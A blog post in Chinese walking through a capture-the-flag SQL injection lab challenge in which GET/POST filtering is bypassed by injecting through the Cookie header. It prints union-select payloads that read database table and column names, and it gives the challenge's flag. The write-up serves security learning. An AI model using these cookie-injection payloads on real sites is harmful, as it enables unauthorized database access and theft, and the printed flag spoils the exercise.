美文网首页
网络信息安全攻防学习平台 注入关第八

网络信息安全攻防学习平台 注入关第八

作者: 沙雕带你蒿羊毛 | 来源:发表于2017-11-17 16:32 被阅读0次

    小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!

    http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1

    题目提示过滤了get和post,也就是说,浏览器中的url输入框等东东是不用考虑了,所以我们可以考虑下   请求头中cookie注入。

    and 1=1  and 1=2

    常规注入测试,结果很明显

    那么我们就开始order  by

    order by 4 order by 3

    可以测出来是3个字段

    联合查询一下是爆出来2,3

    顺手查一下数据库 用这个

    Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3

    爆出数据库 manager_sqli8,   sae_user_sqli8

    Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655F6D616E616765725F73716C6938),3

    我们先查一下sae_manager_sqli8

    因为sae_user_sqli8我查过了。。里面没有啊

    爆出id,username,password

    答案出来了

    IamFlagCookieInject!

    相关文章

      网友评论

          本文标题:网络信息安全攻防学习平台 注入关第八

          本文链接:https://www.haomeiwen.com/subject/rservxtx.html